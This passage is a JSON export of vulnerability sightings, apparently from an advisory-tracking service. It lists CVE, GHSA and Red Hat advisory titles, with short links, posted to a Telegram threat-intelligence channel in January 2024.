"seen", "source": "https://t.me/ctinow/169643", "content": "https://ift.tt/6xF7uHJ\nCVE-2023-48704 | ClickHouse buffer overflow (GHSA-5rmf-5g48-xv63)", "creation_timestamp": "2024-01-18T10:11:31.000000Z"}, {"uuid": "5c95b8d2-f5d9-407a-beab-58d143a8fba2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q9JR-726G-9495", "type": "seen", "source": "https://t.me/ctinow/169642", "content": "https://ift.tt/s7zYHZy\nCVE-2023-50254 | linuxdeepin developer-center up to 6.0.6 docx Document path traversal (GHSA-q9jr-726g-9495)", "creation_timestamp": "2024-01-18T10:11:30.000000Z"}, {"uuid": "6a5e7124-6dca-43b2-9479-a00b8175076d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XWQC-7JC4-XM73", "type": "seen", "source": "https://t.me/ctinow/169640", "content": "https://ift.tt/NtM3TZB\nCVE-2023-50250 | Cacti up to 1.2.25 XML Template templates_import.php cross site scripting (GHSA-xwqc-7jc4-xm73)", "creation_timestamp": "2024-01-18T10:11:27.000000Z"}, {"uuid": "f935ed18-0036-4fbc-bd00-bae360834b31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0804", "type": "seen", "source": "https://t.me/ctinow/175295", "content": "https://ift.tt/hquBgQF\nCVE-2019-0205 | Apache Thrift up to 0.12.0 infinite loop (RHSA-2020:0804)", "creation_timestamp": "2024-01-29T15:11:32.000000Z"}, {"uuid": "fd807c9c-2357-4eab-b2a6-5f9d6436a78b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8959-RFXH-R4J4", "type": "seen", "source": "https://t.me/ctinow/173716", "content": "https://ift.tt/Fv04TyM\nCVE-2024-21651 | XWiki xwiki-platform-distribution-war Attachment denial of service (GHSA-8959-rfxh-r4j4)", "creation_timestamp": "2024-01-25T19:16:46.000000Z"}, {"uuid": "eb3fe452-e847-47be-b8cc-f7af7700f01f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4269", "type": "seen", "source": "https://t.me/ctinow/175174", "content": "https://ift.tt/QPBUEVJ\nCVE-2019-18466 | libpod up to 1.5.x Podman link following (RHSA-2019:4269)", "creation_timestamp": "2024-01-29T11:41:07.000000Z"}, {"uuid": "8c0a070d-24be-43b6-9f79-03b104c293fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XVV8-66CQ-PRWR", "type": "seen", "source": "https://t.me/ctinow/174233", "content": "https://ift.tt/3jaXOdc\nCVE-2022-36763 | TianoCore EDK2 up to 202311 Tcg2MeasureGptTable heap-based overflow (GHSA-xvv8-66cq-prwr)", "creation_timestamp": "2024-01-26T14:11:04.000000Z"}, {"uuid": "56fe726c-ea67-427f-b6f6-57f95d8de780", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0577", "type": "seen", "source": "https://t.me/ctinow/175921", "content": "https://ift.tt/0SjOQLe\nRHSA-2024:0577: Important: linux-firmware security update", "creation_timestamp": "2024-01-30T14:21:43.000000Z"}, {"uuid": "3241df4b-eb25-4c9a-810a-e410be9a3a0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0578", "type": "seen", "source": "https://t.me/ctinow/175920", "content": "https://ift.tt/WzT18RQ\nRHSA-2024:0578: Moderate: c-ares security update", "creation_timestamp": "2024-01-30T14:21:42.000000Z"}, {"uuid": "f78ea73d-49ce-4032-8ae2-3b03f1ecee84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0579", "type": "seen", "source": "https://t.me/ctinow/175919", "content": "https://ift.tt/Xhw6g9U\nRHSA-2024:0579: Moderate: perl-HTTP-Tiny security update", "creation_timestamp": "2024-01-30T14:21:41.000000Z"}, {"uuid": "36ccd0fd-fb21-4a5f-9109-2e6274b8bf90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0580", "type": "seen", "source": "https://t.me/ctinow/175918", "content": "https://ift.tt/aMIA6nY\nRHSA-2024:0580: Moderate: samba security update", "creation_timestamp": "2024-01-30T14:21:39.000000Z"}, {"uuid": "96778f05-f061-4635-830e-0553fbaf9346", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0582", "type": "seen", "source": "https://t.me/ctinow/175917", "content": "https://ift.tt/V8RbrwB\nRHSA-2024:0582: Moderate: rpm security update", "creation_timestamp": "2024-01-30T14:21:38.000000Z"}, {"uuid": "6829157f-55e1-4f20-8776-f3ab9a07e9ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0584", "type": "seen", "source": "https://t.me/ctinow/175916", "content": "https://ift.tt/QmK5eaV\nRHSA-2024:0584: Moderate: libmicrohttpd security update", "creation_timestamp": "2024-01-30T14:21:37.000000Z"}, {"uuid": "434c0479-f107-4694-aa72-4a653a04222a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0585", "type": "seen", "source": "https://t.me/ctinow/175915", "content": "https://ift.tt/lPDMbV3\nRHSA-2024:0585: Moderate: curl security and bug fix update", "creation_timestamp": "2024-01-30T14:21:36.000000Z"}, {"uuid": "35562504-5ade-4248-914c-cf24d2f61252", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0586", "type": "seen", "source": "https://t.me/ctinow/175914", "content": "https://ift.tt/s1rVIWL\nRHSA-2024:0586: Moderate: python3 security update", "creation_timestamp": "2024-01-30T14:21:35.000000Z"}, {"uuid": "515763bf-579d-414e-a405-685846ea5acb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0588", "type": "seen", "source": "https://t.me/ctinow/175913", "content": "https://ift.tt/KAiayus\nRHSA-2024:0588: Moderate: python-urllib3 security update", "creation_timestamp": "2024-01-30T14:21:34.000000Z"}, {"uuid": "7ed45b21-67f7-4c0a-97cf-93753c9ca294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0589", "type": "seen", "source": "https://t.me/ctinow/175912", "content": "https://ift.tt/25l6HVe\nRHSA-2024:0589: Moderate: sqlite security update", "creation_timestamp": "2024-01-30T14:21:33.000000Z"}, {"uuid": "05024e44-7dd9-4647-99de-7c65e90b3743", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0593", "type": "seen", "source": "https://t.me/ctinow/175911", "content": "https://ift.tt/IetWxmg\nRHSA-2024:0593: Important: kpatch-patch security update", "creation_timestamp": "2024-01-30T14:21:31.000000Z"}, {"uuid": "90bc0b85-35f9-4007-991d-652ab6eedfba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0558", "type": "seen", "source": "https://t.me/ctinow/175861", "content": "https://ift.tt/6HwIexL\nRHSA-2024:0558: Important: tigervnc security update", "creation_timestamp": "2024-01-30T12:16:59.000000Z"}, {"uuid": "d9da8523-86d8-4092-95cb-f045f6787b15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0559", "type": "seen", "source": "https://t.me/ctinow/175860", "content": "https://ift.tt/vw0zTjq\nRHSA-2024:0559: Important: firefox security update", "creation_timestamp": "2024-01-30T12:16:58.000000Z"}, {"uuid": "534996b9-6a09-437a-9975-775d837614f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RXPW-85VW-FX87", "type": "seen", "source": "https://t.me/ctinow/174492", "content": "https://ift.tt/cnvVedT\n[GHSA-rxpw-85vw-fx87] OpenFGA denial of service", "creation_timestamp": "2024-01-26T21:31:25.000000Z"}, {"uuid": "3422d7d8-8857-4ca3-8891-12290aa83496", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0266", "type": "seen", "source": "https://t.me/ctinow/169884", "content": "https://ift.tt/sxtoXvK\nRHSA-2024:0266: Important: java-11-openjdk security update", "creation_timestamp": "2024-01-18T19:17:07.000000Z"}, {"uuid": "567089a4-8811-487b-b617-9c80d5e8e950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0554", "type": "seen", "source": "https://t.me/ctinow/175645", "content": "https://ift.tt/re7XtJf\nRHSA-2024:0554: Important: kpatch-patch security update", "creation_timestamp": "2024-01-30T02:17:03.000000Z"}, {"uuid": "bb84274b-c7a8-4b3e-9117-34700c2f60ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MW99-9CHC-XW7R", "type": "seen", "source": "https://t.me/ctinow/170231", "content": "https://ift.tt/TDr5sa4\nCVE-2023-49568 | go-git prior 5.11.0 Server Reply denial of service (GHSA-mw99-9chc-xw7r)", "creation_timestamp": "2024-01-19T15:16:32.000000Z"}, {"uuid": "3345fdb1-34ee-4bc8-8803-bc8dfe6bbef9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0156", "type": "seen", "source": "https://t.me/ctinow/166071", "content": "https://ift.tt/8N6rtSC\nRHSA-2024:0156: Important: .NET 6.0 security update", "creation_timestamp": "2024-01-10T19:17:13.000000Z"}, {"uuid": "af51c78a-ed13-49b9-ab73-a738ff832786", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MQJ-M65W-JGHX", "type": "seen", "source": "https://t.me/ctinow/165946", "content": "https://ift.tt/CnIrMAu\n[GHSA-2mqj-m65w-jghx] Untrusted search path under some conditions on Windows allows arbitrary code execution", "creation_timestamp": "2024-01-10T16:51:38.000000Z"}, {"uuid": "f03339a7-059f-4973-bc88-c343b1cd703f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-449P-3H89-PW88", "type": "seen", "source": "https://t.me/ctinow/165945", "content": "https://ift.tt/lXJhFqx\n[GHSA-449p-3h89-pw88] Maliciously crafted Git server replies can lead to path traversal and RCE on go-git clients", "creation_timestamp": "2024-01-10T16:46:28.000000Z"}, {"uuid": "87b90f73-8dbb-4366-b22a-ed2585b6851d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P7W3-J66H-M7MX", "type": "seen", "source": "https://t.me/ctinow/169721", "content": "https://ift.tt/9Z0Pj8z\nCVE-2023-51386 | awslabs sandbox-accounts-for-events up to 1.9.x privileges management (GHSA-p7w3-j66h-m7mx)", "creation_timestamp": "2024-01-18T13:46:54.000000Z"}, {"uuid": "269770f0-8d09-4940-89b6-04a50d003e1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-593R-747G-P92P", "type": "seen", "source": "https://t.me/ctinow/169722", "content": "https://ift.tt/ygS5Kjd\nCVE-2023-50712 | dfir-iris iris-web up to 2.3.6 cross site scripting (GHSA-593r-747g-p92p)", "creation_timestamp": "2024-01-18T13:46:55.000000Z"}, {"uuid": "6ce6e538-10a6-4aed-8dc5-bc5fe05fcee7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C2F4-CVQM-65W2", "type": "seen", "source": "https://t.me/ctinow/173396", "content": "https://ift.tt/8ynHTIC\nCVE-2024-21647 | Puma up to 5.6.7/6.4.1 Chunked Transfer Encoding Parser request smuggling (GHSA-c2f4-cvqm-65w2)", "creation_timestamp": "2024-01-25T12:11:24.000000Z"}, {"uuid": "0e5f8ef9-797a-4ec9-be24-2b8920b39b47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0224", "type": "seen", "source": "https://t.me/ctinow/169350", "content": "https://ift.tt/pdJs0Eh\nRHSA-2024:0224: Important: java-1.8.0-openjdk security and bug fix update", "creation_timestamp": "2024-01-17T17:16:41.000000Z"}, {"uuid": "51dce0fb-a2c0-4dda-a678-bbbf52c285e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0193", "type": "seen", "source": "https://t.me/ctinow/169218", "content": "https://ift.tt/QTvSVoK\nRHSA-2024:0193: Important: OpenShift Container Platform 4.13.29 bug fix and security update", "creation_timestamp": "2024-01-17T11:16:41.000000Z"}, {"uuid": "ca7a180c-2a52-4b4a-a870-ca334de6ecdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0225", "type": "seen", "source": "https://t.me/ctinow/169196", "content": "https://ift.tt/YpinzC8\nRHSA-2024:0225: Important: java-1.8.0-openjdk security and bug fix update", "creation_timestamp": "2024-01-17T10:16:28.000000Z"}, {"uuid": "2c052379-b628-4365-904c-13e4a1f38996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0234", "type": "seen", "source": "https://t.me/ctinow/169195", "content": "https://ift.tt/BiFMxQP\nRHSA-2024:0234: Important: java-11-openjdk security update", "creation_timestamp": "2024-01-17T10:16:27.000000Z"}, {"uuid": "f6ee90f2-ed20-4a94-91cd-48606b91ab25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0241", "type": "seen", "source": "https://t.me/ctinow/169194", "content": "https://ift.tt/Dzs0qLB\nRHSA-2024:0241: Important: java-17-openjdk security and bug fix update", "creation_timestamp": "2024-01-17T10:16:26.000000Z"}, {"uuid": "d1716ee6-5bba-4ba6-a581-e882f7d99028", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0249", "type": "seen", "source": "https://t.me/ctinow/169193", "content": "https://ift.tt/blX1Odm\nRHSA-2024:0249: Important: java-21-openjdk security update", "creation_timestamp": "2024-01-17T10:16:25.000000Z"}, {"uuid": "9c78511d-7a4c-4865-adda-4f1e92246583", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0273", "type": "seen", "source": "https://t.me/ctinow/169192", "content": "https://ift.tt/TMOBQZq\nRHSA-2024:0273: Important: OpenShift Virtualization 4.12.9 Images security and bug fix update", "creation_timestamp": "2024-01-17T10:16:24.000000Z"}, {"uuid": "2ec8e6d0-1758-438e-b02b-f703ed7eb81b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0299", "type": "seen", "source": "https://t.me/ctinow/169864", "content": "https://ift.tt/DCvx28r\nRHSA-2024:0299: Moderate: python-requests security update", "creation_timestamp": "2024-01-18T18:16:35.000000Z"}, {"uuid": "35964ac7-0798-401a-b157-2046c8b805b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0300", "type": "seen", "source": "https://t.me/ctinow/169863", "content": "https://ift.tt/BaPuXtL\nRHSA-2024:0300: Moderate: python-urllib3 security update", "creation_timestamp": "2024-01-18T18:16:32.000000Z"}, {"uuid": "d693e6ae-e599-4558-a7d4-d11e1e500f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6R8P-HPG7-825G", "type": "seen", "source": "https://t.me/ctinow/169828", "content": "https://ift.tt/ngHW21E\n[GHSA-6r8p-hpg7-825g] Uncontrolled Recursion in SurrealQL Parsing", "creation_timestamp": "2024-01-18T17:07:29.000000Z"}, {"uuid": "df39a0a1-2ee0-43cf-ad14-f5a9902d792a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M24X-R6Q3-2VP9", "type": "seen", "source": "https://t.me/ctinow/169823", "content": "https://ift.tt/bKXHx7C\n[GHSA-m24x-r6q3-2vp9] Uncaught Exception processing HTTP Headers in SurrealDB", "creation_timestamp": "2024-01-18T16:51:48.000000Z"}, {"uuid": "83225cdb-7cf9-41f6-8b2b-068764f3b6a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JM4V-58R5-66HJ", "type": "seen", "source": "https://t.me/ctinow/169822", "content": "https://ift.tt/b6qBN3A\n[GHSA-jm4v-58r5-66hj] Uncaught Exception in surrealdb", "creation_timestamp": "2024-01-18T16:51:46.000000Z"}, {"uuid": "c9a82048-a483-41d6-86ae-657f33d1b811", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CG8W-7Q5V-G32R", "type": "seen", "source": "https://t.me/ctinow/169720", "content": "https://ift.tt/oxOQBVa\nCVE-2023-50928 | awslabs sandbox-accounts-for-events up to 1.0.x access control (GHSA-cg8w-7q5v-g32r)", "creation_timestamp": "2024-01-18T13:46:52.000000Z"}, {"uuid": "c596685e-c043-4953-b349-a3fcd8029a1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P5CH-RRPM-WVHM", "type": "seen", "source": "https://t.me/ctinow/169712", "content": "https://ift.tt/aDNkjIf\nCVE-2023-50924 | Englesystem up to 3.4.0 DECT number/mobile number/work-log comment cross site scripting (GHSA-p5ch-rrpm-wvhm)", "creation_timestamp": "2024-01-18T13:21:18.000000Z"}, {"uuid": "37bc7349-37aa-4eec-a444-ccb640472a09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5J2P-Q736-HW98", "type": "seen", "source": "https://t.me/ctinow/169645", "content": "https://ift.tt/Q42ZAJs\nCVE-2023-49792 | Nextcloud Server/Enterprise Server excessive authentication (GHSA-5j2p-q736-hw98)", "creation_timestamp": "2024-01-18T10:11:33.000000Z"}, {"uuid": "686c0fbf-965e-4ce3-b14c-19fda559340c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F6JH-HVG2-9525", "type": "seen", "source": "https://t.me/ctinow/169510", "content": "https://ift.tt/HlpD9LV\n[GHSA-f6jh-hvg2-9525] crystals-go vulnerable to KyberSlash (timing side-channel attack for Kyber)", "creation_timestamp": "2024-01-17T23:16:12.000000Z"}, {"uuid": "2e3acec0-9e5b-4525-bc46-d192c2d652b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0198", "type": "seen", "source": "https://t.me/ctinow/169449", "content": "https://ift.tt/1vPikZM\nRHSA-2024:0198: Important: OpenShift Container Platform 4.12.47 security update", "creation_timestamp": "2024-01-17T20:21:57.000000Z"}, {"uuid": "bc2e6cf8-9bf5-41e5-8692-e0d1c0d9d3f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0207", "type": "seen", "source": "https://t.me/ctinow/169387", "content": "https://ift.tt/IQzWXC7\nRHSA-2024:0207: Moderate: OpenShift Container Platform 4.14.9 packages and security update", "creation_timestamp": "2024-01-17T18:16:42.000000Z"}, {"uuid": "a15602f0-98c0-4c0f-8fb8-6f1640492bd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0233", "type": "seen", "source": "https://t.me/ctinow/169386", "content": "https://ift.tt/CLMdSc6\nRHSA-2024:0233: Important: java-11-openjdk security update", "creation_timestamp": "2024-01-17T18:16:39.000000Z"}, {"uuid": "5760bc20-82ba-4be8-9595-e612a2922317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0235", "type": "seen", "source": "https://t.me/ctinow/169385", "content": "https://ift.tt/V0MgSzN\nRHSA-2024:0235: Important: java-11-openjdk security update", "creation_timestamp": "2024-01-17T18:16:36.000000Z"}, {"uuid": "d6eaac22-2897-404e-994d-0e6f0ba31153", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0237", "type": "seen", "source": "https://t.me/ctinow/169384", "content": "https://ift.tt/Hb0uh93\nRHSA-2024:0237: Important: java-11-openjdk security update", "creation_timestamp": "2024-01-17T18:16:33.000000Z"}, {"uuid": "74d3d60a-cc86-4930-8afa-30c009cff260", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4576-M8PX-W9QJ", "type": "seen", "source": "https://t.me/ctinow/169711", "content": "https://ift.tt/aXLhgQB\nCVE-2023-51387 | Dromara Hertzbeat up to 1.4.0 code injection (GHSA-4576-m8px-w9qj)", "creation_timestamp": "2024-01-18T13:21:17.000000Z"}, {"uuid": "7ff8db03-69d3-45b0-8b95-e65626ad23ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0306", "type": "seen", "source": "https://t.me/ctinow/173119", "content": "https://ift.tt/VBzi0Np\nRHSA-2024:0306: Important: OpenShift Container Platform 4.11.57 bug fix and security update", "creation_timestamp": "2024-01-24T22:16:46.000000Z"}, {"uuid": "1eb6102d-1ac1-4fd1-a9d1-db4ac6e6b854", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0424", "type": "seen", "source": "https://t.me/ctinow/172931", "content": "https://ift.tt/p4K2qUn\nRHSA-2024:0424: Moderate: rpm security update", "creation_timestamp": "2024-01-24T17:17:01.000000Z"}, {"uuid": "2ac85a84-119f-49f2-9d78-ab57150104ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QW9F-QV29-8938", "type": "seen", "source": "https://t.me/ctinow/169609", "content": "https://ift.tt/ymH9Dp8\nCVE-2023-48298 | ClickHouse up to 23.10.2.14 Decompression integer underflow (GHSA-qw9f-qv29-8938)", "creation_timestamp": "2024-01-18T08:11:49.000000Z"}, {"uuid": "ae1274f7-3355-43f2-a4c7-c3816e1a508e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0226", "type": "seen", "source": "https://t.me/ctinow/169349", "content": "https://ift.tt/CtuiRVx\nRHSA-2024:0226: Important: java-1.8.0-openjdk security and bug fix update", "creation_timestamp": "2024-01-17T17:16:38.000000Z"}, {"uuid": "89b9878a-76a7-4181-9ac7-392958bbb542", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0232", "type": "seen", "source": "https://t.me/ctinow/169348", "content": "https://ift.tt/fD3bOTI\nRHSA-2024:0232: Important: java-11-openjdk security update", "creation_timestamp": "2024-01-17T17:16:36.000000Z"}, {"uuid": "e8b0da38-497f-4603-8450-76d11db87936", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8F24-6M29-WM2R", "type": "seen", "source": "https://t.me/ctinow/169477", "content": "https://ift.tt/LynzJui\n[GHSA-8f24-6m29-wm2r] use-after-free in tracing", "creation_timestamp": "2024-01-17T21:46:23.000000Z"}, {"uuid": "6749a998-84e9-405b-bfc4-5d1f5571adbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V363-RRF2-5FMJ", "type": "seen", "source": "https://t.me/ctinow/169476", "content": "https://ift.tt/I1Ko02V\n[GHSA-v363-rrf2-5fmj] ferris-says has undefined behavior when not using UTF-8", "creation_timestamp": "2024-01-17T21:46:21.000000Z"}, {"uuid": "a8a59c15-891b-4fb9-8f3f-b501aacb20e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0200", "type": "seen", "source": "https://t.me/ctinow/169448", "content": "https://ift.tt/O5ukbIz\nRHSA-2024:0200: Moderate: OpenShift Container Platform 4.12.47 security update", "creation_timestamp": "2024-01-17T20:21:54.000000Z"}, {"uuid": "65415edd-f917-4d67-baa7-fe3354686d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0228", "type": "seen", "source": "https://t.me/ctinow/169447", "content": "https://ift.tt/qaFoUiQ\nRHSA-2024:0228: Important: java-1.8.0-openjdk security update", "creation_timestamp": "2024-01-17T20:21:51.000000Z"}, {"uuid": "fae0b488-8741-4cde-b6b4-6d5f5a04d3ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0242", "type": "seen", "source": "https://t.me/ctinow/169446", "content": "https://ift.tt/1D5AOPG\nRHSA-2024:0242: Important: java-17-openjdk security and bug fix update", "creation_timestamp": "2024-01-17T20:21:48.000000Z"}, {"uuid": "772fa853-ce27-4647-b7e2-c099d5afc96b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RXGG-273W-RFW7", "type": "seen", "source": "https://t.me/ctinow/169013", "content": "https://ift.tt/w1G8K3y\n[GHSA-rxgg-273w-rfw7] Remote Code Execution vulnerability in Apache IoTDB via UDF", "creation_timestamp": "2024-01-16T21:52:00.000000Z"}, {"uuid": "7f904c24-991a-48d6-8a17-188e32e3d46e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 